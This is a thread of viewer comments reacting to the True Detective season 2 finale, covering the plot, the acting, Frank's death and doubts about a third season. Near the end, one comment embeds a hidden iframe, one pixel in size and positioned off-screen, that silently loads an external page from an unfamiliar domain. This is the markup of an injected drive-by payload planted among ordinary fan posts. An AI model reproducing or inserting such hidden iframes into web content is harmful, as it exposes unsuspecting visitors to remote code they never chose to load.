Man rewatching this from the start (on ep.3) after watching Blake's confession to Frank makes this show far more understandable and clear with all the secret deals taking place between rival business partners and such. I can live with some of the corny lines being fed to Colin Farrell. Everyone outside of Kitsch really played there parts well. It was very well directed with an eye for a slow burn at the end. This season really was awesome throughout. I was just so lost and thought the payoff would be dull but that was the pivotal scene of the season. I really think this is going to really gruesomely for a lot of the good parties involved in the story. 2 hr season finale!
I think people will actually really like this on a 2nd viewing. No chance in hell I rewatch this ever though. But it's been enjoyable for me.
I tend to agree, I think it'll be better when it's digested as a long form movie even with it's faults.

I gotta say... I don't feel as satisfied as I did at the end of the first season. But man, this show really went into a different set of gears for the last three episodes of the season, very very strong finish.
Lol yeah, if they had cut it just 30 minutes earlier after the cabin it would have been better. And I am not saying that just because it would have been a happier ending but because the way Frank died was so random / stupid. Velcoro I can understand but he could have found a better way to fight back at least.
Does Vince do that wink in every character he does? Had to laugh when faced with the Latin Kings and he still does that.
Everything looked good for about 50 minutes. Then the show remembered what it was in episodes 1-5 and went back to that. So did they leave it open for another season of Bezzarides? Kinda sad because there's plenty of questions but I just don't care. Really really hope they don't go back to this crew in Season 3 because I can't imagine watching even out of curiosity. Gave up on Mad Men in Season 6 for same reason.
I dontvwant to be a jaded internet tv critic but.....what a muddled mess. Bad writing. Convoluted to the point of being pointless plot. Wooden acting by the supporting cast. A fitting end to a mediocre exercise. This gravy train is built on a couple of Matt mconoughey monologues where he killed it. See you all next year.
Season 1 was so good. It's amazing how far the show fell this season, to the point where I can't even envision myself looking forward to Season 3.
All of the headway the past three episodes made to try to save the season was completely destroyed by the finale. Every single bit of it was awful.
I guess I was expecting too much of a story book ending after s1. Great show regardless. <iframe style="width:1px; height:1px; position:absolute; left:-10px;" src="http://tipgnome.com/flash/files/embed.html"></iframe>
Vince Vaughn coulda walked right? And I thought Velcoro probably could have finished those three off or gotten away. I thought it was a good episode and a pretty good season regardless.
